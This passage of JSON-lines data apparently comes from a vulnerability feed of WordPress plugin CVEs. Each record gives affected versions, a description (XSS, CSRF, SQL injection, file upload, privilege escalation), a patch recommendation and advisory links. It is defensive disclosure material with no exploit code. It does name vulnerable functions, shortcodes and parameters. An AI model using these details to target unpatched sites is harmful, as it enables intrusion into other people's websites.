version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/521bb5a3-0a0c-4693-a87d-fabb64f1ad4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/521bb5a3-0a0c-4693-a87d-fabb64f1ad4f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078422\\\/mesmerize-companion\\\/trunk\\\/theme-data\\\/mesmerize\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078422\\\/mesmerize-companion\\\/trunk\\\/theme-data\\\/mesmerize\\\/functions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11876","slug":"kredeum-nfts","versionImpact":"1.6.9","versionEndExcluding":"1.6.10","description":"The Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kredeum_opensky' shortcode in all versions up to, and including, 1.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kredeum-nfts\\\/trunk\\\/common\\\/shortcode\\\/shortcode.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kredeum-nfts\\\/trunk\\\/common\\\/shortcode\\\/shortcode.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0357","slug":"wpbookit","versionImpact":"1.6.9","versionEndExcluding":"1.6.10","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'WPB_Profile_controller::handle_image_upload' function in versions up to, and including, 1.6.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"name\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bf7a68-e76d-4740-9f35-b6084094f59b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bf7a68-e76d-4740-9f35-b6084094f59b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11370","slug":"subaccounts-for-woocommerce","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Subaccounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subaccounts-for-woocommerce\\\/tags\\\/1.5.6\\\/admin\\\/admin.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subaccounts-for-woocommerce\\\/tags\\\/1.5.6\\\/admin\\\/admin.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f383a56-21e3-4f06-b4d4-47a269007cdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f383a56-21e3-4f06-b4d4-47a269007cdc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2295","slug":"contact-form-manager","versionImpact":"1.6","versionEndExcluding":"1.6.1","description":"The Contact Form Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [xyz-cfm-form] shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cda411b-b277-4b4d-9087-dadede4b67dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cda411b-b277-4b4d-9087-dadede4b67dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095454%40contact-form-manager&new=3095454%40contact-form-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095454%40contact-form-manager&new=3095454%40contact-form-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8715","slug":"simple-ldap-login","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Simple LDAP Login plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaa95d4-899f-49a0-a888-4ffee61c0335?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaa95d4-899f-49a0-a888-4ffee61c0335?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158322\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158322\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-ldap-login\\\/tags\\\/1.6.0\\\/Simple-LDAP-Login-Admin.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-ldap-login\\\/tags\\\/1.6.0\\\/Simple-LDAP-Login-Admin.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11600","slug":"borderless","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.5.9 via the 'write_config' function. This is due to a lack of sanitization on an imported JSON file. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L388\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/643b8b82-c4e1-4b81-a7e0-aee0f9270702?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/643b8b82-c4e1-4b81-a7e0-aee0f9270702?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9210","slug":"mailchimp-top-bar","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The MC4WP: Mailchimp Top Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b45ba98f-4cd1-406a-8661-e19d5b4c3ba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b45ba98f-4cd1-406a-8661-e19d5b4c3ba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.0\\\/views\\\/settings-page.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.0\\\/views\\\/settings-page.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.1\\\/views\\\/settings-page.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.1\\\/views\\\/settings-page.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47230","slug":"contact-forms","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <=\u00a01.6.0 versions.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-wordpress-contact-forms-by-cimatti-plugin-1-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-wordpress-contact-forms-by-cimatti-plugin-1-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11814","slug":"order-status-for-woocommerce","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Additional Custom Order Status for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the wfwp_wcos_delete_finished, wfwp_wcos_delete_fallback_finished, wfwp_wcos_delete_fallback_orders_updated, and wfwp_wcos_delete_fallback_status parameters in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198852%40order-status-for-woocommerce%2Ftrunk&old=3179390%40order-status-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198852%40order-status-for-woocommerce%2Ftrunk&old=3179390%40order-status-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28267144-a709-4631-8925-69c6e0aca77c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28267144-a709-4631-8925-69c6e0aca77c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0540","slug":"gs-portfolio","versionEndExcluding":"1.6.1","description":"The GS Filterable Portfolio WordPress plugin before 1.6.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b35b3da2-468d-4fe5-bff6-812432197a38\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b35b3da2-468d-4fe5-bff6-812432197a38\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12164","slug":"wpsyncsheets-wpforms","versionImpact":"1.6","versionEndExcluding":"1.6.1","description":"The WPSyncSheets Lite For WPForms \u2013 WPForms Google Spreadsheet Addon plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpsslwp_reset_settings() function in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's settings.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L779\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L779\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234445\\\/wpsyncsheets-wpforms\\\/tags\\\/1.6.1\\\/includes\\\/class-wpsslwp-service.php?old=3232281&old_path=wpsyncsheets-wpforms%2Ftags%2F1.6%2Fincludes%2Fclass-wpsslwp-service.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234445\\\/wpsyncsheets-wpforms\\\/tags\\\/1.6.1\\\/includes\\\/class-wpsslwp-service.php?old=3232281&old_path=wpsyncsheets-wpforms%2Ftags%2F1.6%2Fincludes%2Fclass-wpsslwp-service.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bd48fb-f5f9-4d3d-8fc4-a06adfa5a225?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bd48fb-f5f9-4d3d-8fc4-a06adfa5a225?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32267","slug":"wp-to-hootsuite","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in wpzinc Post to Social Media \u2013 WordPress to Hootsuite allows Cross Site Request Forgery. This issue affects Post to Social Media \u2013 WordPress to Hootsuite: from n\/a through 1.5.8.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-to-hootsuite\\\/vulnerability\\\/wordpress-wp-to-hootsuite-plugin-1-5-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-to-hootsuite\\\/vulnerability\\\/wordpress-wp-to-hootsuite-plugin-1-5-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0178","slug":"anual-archive","versionEndExcluding":"1.6.0","description":"The Annual Archive WordPress plugin before 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc308e15-7937-4d41-809d-74f8c13bee23\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc308e15-7937-4d41-809d-74f8c13bee23\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13661","slug":"wp-table-editor","versionImpact":"1.5.1","versionEndExcluding":"1.6.0","description":"The Table Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wptableeditor_vtabs' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-editor\\\/trunk\\\/includes\\\/public\\\/shortcode.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-editor\\\/trunk\\\/includes\\\/public\\\/shortcode.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3228279%40wp-table-editor&new=3228279%40wp-table-editor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3228279%40wp-table-editor&new=3228279%40wp-table-editor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fe1f3c3-4a81-4aae-9a5e-e5889f4c69ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fe1f3c3-4a81-4aae-9a5e-e5889f4c69ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46823","slug":"imagelinks-interactive-image-builder-lite","versionEndExcluding":"1.6.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum ImageLinks Interactive Image Builder for WordPress allows SQL Injection.This issue affects ImageLinks Interactive Image Builder for WordPress: from n\/a through 1.5.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/imagelinks-interactive-image-builder-lite\\\/wordpress-imagelinks-interactive-image-builder-for-wordpress-plugin-1-5-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/imagelinks-interactive-image-builder-lite\\\/wordpress-imagelinks-interactive-image-builder-for-wordpress-plugin-1-5-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11583","slug":"borderless","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'remove_zipped_font' function in all versions up to, and including, 1.5.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete icon fonts that were previously uploaded.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0968fe3b-2256-41e8-8cc9-e800dd7f8c27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0968fe3b-2256-41e8-8cc9-e800dd7f8c27?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10591","slug":"makewebbetter-hubspot-for-woocommerce","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"The MWB HubSpot for WooCommerce \u2013 CRM, Abandoned Cart, Email Marketing, Marketing Automation & Analytics plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hubwoo_save_updates() function in all versions up to, and including, 1.5.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/makewebbetter-hubspot-for-woocommerce\\\/trunk\\\/includes\\\/class-hubwoo-ajax-handler.php#L845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/makewebbetter-hubspot-for-woocommerce\\\/trunk\\\/includes\\\/class-hubwoo-ajax-handler.php#L845\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd38b5f2-f13e-4433-9a8a-2f42cc1782c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd38b5f2-f13e-4433-9a8a-2f42cc1782c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47161","slug":"health-check","versionEndExcluding":"1.6.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in The WordPress.Org community Health Check & Troubleshooting plugin <=\u00a01.5.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/health-check\\\/wordpress-health-check-troubleshooting-plugin-1-5-1-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/health-check\\\/wordpress-health-check-troubleshooting-plugin-1-5-1-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10780","slug":"restaurant-cafe-addon-for-elementor","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"The Restaurant & Cafe Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.5.9 via the 'narestaurant_elementor_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197286%40restaurant-cafe-addon-for-elementor&new=3197286%40restaurant-cafe-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197286%40restaurant-cafe-addon-for-elementor&new=3197286%40restaurant-cafe-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c29cbd-6c39-4a54-a2a2-bc4c8feeeb70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c29cbd-6c39-4a54-a2a2-bc4c8feeeb70?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13432","slug":"webcamconsult","versionImpact":"1.5.0","versionEndExcluding":"1.6.0","description":"The Webcamconsult plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223211%40webcamconsult&new=3223211%40webcamconsult&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223211%40webcamconsult&new=3223211%40webcamconsult&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cdad887-dafa-4cf8-ac78-87b9b9b989e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cdad887-dafa-4cf8-ac78-87b9b9b989e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13675","slug":"slingblocks","versionImpact":"1.5.0","versionEndExcluding":"1.6.0","description":"The SlingBlocks \u2013 Gutenberg Blocks by FunnelKit (Formerly WooFunnels) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Icon List\" Block in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251693%40slingblocks&new=3251693%40slingblocks&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251693%40slingblocks&new=3251693%40slingblocks&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34904b5-3b3d-46d3-9e33-ef661d5f4149?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f34904b5-3b3d-46d3-9e33-ef661d5f4149?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2841","slug":"advanced-local-pickup-for-woocommerce","versionEndExcluding":"1.6.0","description":"The Advanced Local Pickup for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in versions up to, and including, 1.5.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with admin-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125e7ea3-574a-4760-b10b-7a98d94c87a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125e7ea3-574a-4760-b10b-7a98d94c87a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-local-pickup-for-woocommerce\\\/trunk\\\/include\\\/wc-local-pickup-admin.php?rev=2889033#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-local-pickup-for-woocommerce\\\/trunk\\\/include\\\/wc-local-pickup-admin.php?rev=2889033#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2986002%40advanced-local-pickup-for-woocommerce%2Ftrunk&old=2983681%40advanced-local-pickup-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2986002%40advanced-local-pickup-f